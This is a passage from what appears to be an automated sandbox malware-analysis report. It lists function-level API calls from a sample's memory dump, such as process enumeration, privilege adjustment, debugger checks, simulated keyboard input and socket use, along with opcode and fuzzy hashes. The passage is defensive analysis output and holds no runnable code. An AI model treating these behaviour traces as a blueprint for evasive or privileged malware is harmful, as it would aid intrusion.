                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                              • String ID: *.*
                                              • API String ID: 1972594611-438819550
                                              • Opcode ID: 8b86ea278892b2f035779ad35e6375e5af1f2637d0fa2d3b20031bcab1efb1e7
                                              • Instruction ID: 0a4aa688f63ac67226b75a8ee8d72c3281d351122ce2083a954fec0dfdcf4ca4
                                              • Opcode Fuzzy Hash: 8b86ea278892b2f035779ad35e6375e5af1f2637d0fa2d3b20031bcab1efb1e7
                                              • Instruction Fuzzy Hash: EF41837190124AAFCF14FF65C895AEEBBB4EF05310F248156E405A2191EB319E84CF70
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00D89A4E
                                              • GetSysColor.USER32(0000000F), ref: 00D89B23
                                              • SetBkColor.GDI32(?,00000000), ref: 00D89B36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Color$DialogLongNtdllProc_Window
                                              • String ID:
                                              • API String ID: 1958858920-0
                                              • Opcode ID: 0c7587da0b3f6b9193a8fd8bd79bcb163ce008142bac356e53fe3716bac515b3
                                              • Instruction ID: 84d7302c59ebeaa06452705b8496d2c685357980ec8b18526d0ce58f3c1a221b
                                              • Opcode Fuzzy Hash: 0c7587da0b3f6b9193a8fd8bd79bcb163ce008142bac356e53fe3716bac515b3
                                              • Instruction Fuzzy Hash: D2A1F870208405AEE72CBB2D8CA9F7B669DEB86350B1D020DF5C2E79D2CA25DD41CB71
                                              APIs
                                                • Part of subcall function 00DF304E: inet_addr.WS2_32(?), ref: 00DF307A
                                                • Part of subcall function 00DF304E: _wcslen.LIBCMT ref: 00DF309B
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 00DF185D
                                              • WSAGetLastError.WS2_32 ref: 00DF1884
                                              • bind.WS2_32(00000000,?,00000010), ref: 00DF18DB
                                              • WSAGetLastError.WS2_32 ref: 00DF18E6
                                              • closesocket.WS2_32(00000000), ref: 00DF1915
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 1601658205-0
                                              • Opcode ID: 0d2b52762cea67fb6421d047ab926b3bc1ab02df48f3e14ecd605aa43a0c1e19
                                              • Instruction ID: 170a5b208432a648b1c9b7f292ba504b5375a78ef17af45844f37789f96fdb89
                                              • Opcode Fuzzy Hash: 0d2b52762cea67fb6421d047ab926b3bc1ab02df48f3e14ecd605aa43a0c1e19
                                              • Instruction Fuzzy Hash: 1E51A175A00200AFD710AF24C886F2A77A5EB48718F18C55CFA196F283D671AD418BB1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                              • API String ID: 0-1546025612
                                              • Opcode ID: dc944d964f0cafc0d33563402160dd47044ff44b0ed56ff3e698ec07755a125c
                                              • Instruction ID: faed2f13bba237c633869d042bd5bc6ae536b276c010fd3fe6cfe9a538dc381d
                                              • Opcode Fuzzy Hash: dc944d964f0cafc0d33563402160dd47044ff44b0ed56ff3e698ec07755a125c
                                              • Instruction Fuzzy Hash: 2DA28070E4061ACBDF24CF58C8447EDB7B1BF54314F2881AAE85AA7285EB74DD81DB60
                                              APIs
                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DD82AA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: ($tb$|
                                              • API String ID: 1659193697-1968160224
                                              • Opcode ID: 7ae7266468b5f37269332af75aef6dd2d9c349e9ad045c194eeca45667d69f49
                                              • Instruction ID: 9012a48174f0a53876776ba37f0617141342b91069b55c76c3e4c8faa5a8ed19
                                              • Opcode Fuzzy Hash: 7ae7266468b5f37269332af75aef6dd2d9c349e9ad045c194eeca45667d69f49
                                              • Instruction Fuzzy Hash: E9323574A007059FCB29CF59C481A6AB7F0FF48710B15C56EE49ADB3A1EB70E941DB60
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00DFA6AC
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00DFA6BA
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • Process32NextW.KERNEL32(00000000,?), ref: 00DFA79C
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFA7AB
                                                • Part of subcall function 00D8CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00DB3303,?), ref: 00D8CE8A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                               • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                              • String ID:
                                              • API String ID: 1991900642-0
                                              • Opcode ID: 99f17ce5f74ffbf0296ce1e00d64dba59893816c3c81f01e1569396d8bc0e81d
                                              • Instruction ID: e7dcc0e1f17a49fb3de6e07faf0c5193c4efd68b84f7aea7b557d404209d5043
                                              • Opcode Fuzzy Hash: 99f17ce5f74ffbf0296ce1e00d64dba59893816c3c81f01e1569396d8bc0e81d
                                              • Instruction Fuzzy Hash: 32512AB15083109FD710EF24C886A6BBBE8FF89754F04891DF589A7252EB70D904CBB2
                                              APIs
                                              • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00DDAAAC
                                              • SetKeyboardState.USER32(00000080), ref: 00DDAAC8
                                              • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00DDAB36
                                              • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00DDAB88
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID:
                                              • API String ID: 432972143-0
                                              • Opcode ID: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                              • Instruction ID: c29c33649785bb8fbfa49ef62733e318fced9dbe2be6949e9eea67e12b96927c
                                              • Opcode Fuzzy Hash: e4e89ff15e71d2679c39df29990c991d65578707b615fd7c04a4be83384bec2a
                                              • Instruction Fuzzy Hash: 7F311630A40218AEFB358B6D8C05BFA7BA6EB45310F18831BF191563E0D375C986C772
                                              APIs
                                              • _free.LIBCMT ref: 00DABB7F
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • GetTimeZoneInformation.KERNEL32 ref: 00DABB91
                                              • WideCharToMultiByte.KERNEL32(00000000,?,00E4121C,000000FF,?,0000003F,?,?), ref: 00DABC09
                                              • WideCharToMultiByte.KERNEL32(00000000,?,00E41270,000000FF,?,0000003F,?,?,?,00E4121C,000000FF,?,0000003F,?,?), ref: 00DABC36
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                              • String ID:
                                              • API String ID: 806657224-0
                                              • Opcode ID: c6eed3e421a1e43b7d2eee23bb48516ef3f3ac12b9b5d900eb707420c46f2afe
                                              • Instruction ID: 0501a838078d3cecfb6fafd414ce37b92e50a19f94575852c689e48f38b47281
                                              • Opcode Fuzzy Hash: c6eed3e421a1e43b7d2eee23bb48516ef3f3ac12b9b5d900eb707420c46f2afe
                                              • Instruction Fuzzy Hash: BA31CE70944205DFCB10DF6ADC80929BBB8FF47320B1842AAE060E72B2D7709D86DB74
                                              APIs
                                                • Part of subcall function 00D89BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D89BB2
                                              • GetCursorPos.USER32(?), ref: 00E09001
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00DC7711,?,?,?,?,?), ref: 00E09016
                                              • GetCursorPos.USER32(?), ref: 00E0905E
                                              • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00DC7711,?,?,?), ref: 00E09094
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                              • String ID:
                                              • API String ID: 1423138444-0
                                              • Opcode ID: 76bb91eddd3fabbeb9dc2353754c2d4a33226ba5847df380d95a6a7189902826
                                              • Instruction ID: 03c7a97d63f550c6923a71ebb0d88c244cae95fcf08f12da5351ba0ad8a7c07b
                                              • Opcode Fuzzy Hash: 76bb91eddd3fabbeb9dc2353754c2d4a33226ba5847df380d95a6a7189902826
                                              • Instruction Fuzzy Hash: 6E21EF35200018EFCB258F95CC98EFB7BB9EB8A310F140155F945672A2C376A9D4DB60
                                              APIs
                                              • InternetReadFile.WININET(?,?,00000400,?), ref: 00DECE89
                                              • GetLastError.KERNEL32(?,00000000), ref: 00DECEEA
                                              • SetEvent.KERNEL32(?,?,00000000), ref: 00DECEFE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorEventFileInternetLastRead
                                              • String ID:
                                              • API String ID: 234945975-0
                                              • Opcode ID: 6f60e0cf47f2b86d9f62b412565ea61cb998ebe26b48c4c8dbc0f34dbcd25cd8
                                              • Instruction ID: e6b7ebb48781d40c7ef1f0c3df3ee7a403908580b6c0a269fb7e75b13e18bffb
                                              • Opcode Fuzzy Hash: 6f60e0cf47f2b86d9f62b412565ea61cb998ebe26b48c4c8dbc0f34dbcd25cd8
                                              • Instruction Fuzzy Hash: D121BD71510705AFDB20EFA6C949BAB77F8EF00718F24441EE546A2151E774EE4A8B70
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 00DE5CC1
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00DE5D17
                                              • FindClose.KERNEL32(?), ref: 00DE5D5F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID:
                                              • API String ID: 3541575487-0
                                              • Opcode ID: de4122b0de2dd50f6790a3ab86c3475c6c1892b4cd9648dbdb18ebfac8f2e3cd
                                              • Instruction ID: 3076af6c5323afa05fabe172ce2d0d6e07ea19206711f6f6bf3931063b7ddac1
                                              • Opcode Fuzzy Hash: de4122b0de2dd50f6790a3ab86c3475c6c1892b4cd9648dbdb18ebfac8f2e3cd
                                              • Instruction Fuzzy Hash: B251BD34600A419FC704DF29D894A9AB7E4FF49318F14855DE95A8B3A1DB30EC44CFA1
                                              APIs
                                              • IsDebuggerPresent.KERNEL32 ref: 00DA271A
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00DA2724
                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00DA2731
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 51947eabc2ede1d6c40aeb2d6976920f950e5625bddb84390975de99a8f00c89
                                              • Instruction ID: 880b05dfdc5468ad2a7046cca2a39b4ad19f2d6f92c46754a993431a3e3e68cc
                                              • Opcode Fuzzy Hash: 51947eabc2ede1d6c40aeb2d6976920f950e5625bddb84390975de99a8f00c89
                                              • Instruction Fuzzy Hash: A831C274911218ABCB21DF69DC88798BBB8EF08310F5042EAE80CA6260E7349F858F54
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE51DA
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DE5238
                                              • SetErrorMode.KERNEL32(00000000), ref: 00DE52A1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DiskFreeSpace
                                              • String ID:
                                              • API String ID: 1682464887-0
                                              • Opcode ID: 321205c4b0daa83ce7141bfc7233235183aee20bf87f62240fbadee6bd1bac04
                                              • Instruction ID: a180e468e7af9dc4ea7c3234154f14c2e6eb4569e91a7942e56b2a23cc223542
                                              • Opcode Fuzzy Hash: 321205c4b0daa83ce7141bfc7233235183aee20bf87f62240fbadee6bd1bac04
                                              • Instruction Fuzzy Hash: C4318135A00518DFDB00DF55D884EADBBB4FF49318F188099E909AB366DB31E845CBA0
                                              APIs
                                                • Part of subcall function 00D8FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D90668
                                                • Part of subcall function 00D8FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00D90685
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD170D
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD173A
                                              • GetLastError.KERNEL32 ref: 00DD174A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                              • String ID:
                                              • API String ID: 577356006-0
                                              • Opcode ID: c42d312654b3adc72e085dd2747234f4d2389a581c1c9fddb241e3febe849db4
                                              • Instruction ID: 64e115ba378114e880c06d9410321787166c0707ce7d69217bd0f52ce369cb61
                                              • Opcode Fuzzy Hash: c42d312654b3adc72e085dd2747234f4d2389a581c1c9fddb241e3febe849db4
                                              • Instruction Fuzzy Hash: 1611CEB2400304FFE718AF64DC86D6AB7BDEB04714B20852EE45663251EB70FC868B30
                                              APIs
                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD608
                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00DDD645
                                              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DDD650
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle
                                              • String ID:
                                              • API String ID: 33631002-0
                                              • Opcode ID: 9a6130b58e3c5f687300da448597916c4f34d3204e349355509bbecf73e2cc64
                                              • Instruction ID: 1e6fb064364bfa844efff646e6645b82e1da4c8d6cf020f7dbed0bf7f70ed564
                                              • Opcode Fuzzy Hash: 9a6130b58e3c5f687300da448597916c4f34d3204e349355509bbecf73e2cc64
                                              • Instruction Fuzzy Hash: 4B113C75E05228BFDB108F959C45FAFBBBCEB45B50F108156F904E7290D6708A058BA1
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00DD168C
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00DD16A1
                                              • FreeSid.ADVAPI32(?), ref: 00DD16B1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
